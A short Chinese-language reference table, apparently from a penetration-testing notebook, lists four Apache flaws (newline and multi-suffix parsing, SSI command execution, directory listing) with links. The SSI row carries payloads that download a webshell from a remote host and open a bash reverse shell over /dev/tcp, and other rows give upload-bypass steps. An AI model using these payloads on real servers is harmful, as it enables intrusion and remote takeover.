ID |
技術描述 |
利用場景/條件 |
過程 |
參考 |
武器庫關聯 |
---|---|---|---|---|---|
S1 | Apache換行解析漏洞 | Apache 2.4.0~2.4.29 |
Apache HTTPD是一款HTTP服務器,它可以通過mod_php來運行PHP網頁。其2.4.0~2.4.29版本中存在一個解析漏洞,在解析PHP時,1.php\x0a將被按照PHP后綴進行解析,導致繞過一些服務器的安全策略。 利用方法: burp抓包,在Hex選項卡.php后面0d的位置右鍵-Insert byte,添加一個0a,然后發包,成功上傳
瀏覽器訪問 /x.php%0A,正常解析
|
https://www.cnblogs.com/leixiao-/p/10223090.html | |
S2 | Apache多后綴解析漏洞 | 使用module模式與php結合的所有版本 apache存在未知擴展名解析漏洞,使用fastcig模式與php結合的所有版本apache不存在此漏洞。 |
php本身可以解析: .php3 .php5 .pht .phtml 等等。。。。
2、運維人員在配置服務器時,為了使Apache能夠解析PHP,而自己添加了一個handler :AddHandler application/x-httpd-php .php
上傳1.php.aaaa 訪問1.php.aaaa 解析成功:
|
https://blog.csdn.net/weixin_45427650/article/details/105202486 | |
S3 | Apache SSI遠程命令執行漏洞 | 影響版本:Apache全版本(支持SSI與CGI)
|
漏洞原理 <pre>
<!--#exec cmd="wget http://xxx/shell.txt | rename shell.txt shell.php" --> <!--#exec cmd="/bin/bash -i > /dev/tcp/192.168.0.118/8888 0<&1 2>&1" --> |
https://zhuanlan.zhihu.com/p/125115734 | |
S4 | apache目錄遍歷 | 在httpd.conf文件: Options + Indexes + FollowSymLinks + ExecCGI |
漏洞特征:intitle:index of 在httpd.conf文件中找到 Options +Indexes +FollowSymLinks +ExecCGI 並修改成 Options -Indexes+FollowSymLinks +ExecCGI 並保存 |
https://blog.csdn.net/weixin_45427650/article/details/105202486 |